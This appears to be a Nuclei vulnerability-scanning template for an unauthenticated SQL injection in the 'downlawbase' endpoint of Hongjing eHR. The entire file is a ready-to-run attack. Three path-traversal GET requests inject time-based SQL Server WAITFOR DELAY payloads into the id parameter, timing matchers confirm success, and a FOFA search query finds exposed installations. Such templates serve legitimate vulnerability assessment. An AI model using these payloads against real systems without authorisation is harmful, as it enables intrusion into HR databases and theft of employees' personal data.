id: hongjing-ehr-downlawbase-sql-Injection
info:
  name: 宏景eHR downlawbase 接口处存在SQL注入漏洞
  author: someone
  severity: critical
  description: 宏景eHR downlawbase 接口处存在SQL注入漏洞，未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令，从而窃取数据库敏感信息。
  reference:
  metadata:
    verified: true
    max-request: 1
    fofa-query: FOFA:app="HJSOFT-HCM"
  tags: sqli
requests:
  - raw:
      - |-
        @timeout=5s
        GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:0'--+ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
        Connection: close
      - |-
        @timeout=5s
        GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:2'--+ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
        Connection: close
      - |-
        @timeout=5s
        GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
        Connection: close
    matchers:
      - type: dsl
        condition: and
        dsl:
          - "duration_1>=0  && duration_1<=2"
          - "duration_2>=2  && duration_2<=4"
          - "duration_3>=4  && duration_3<=6"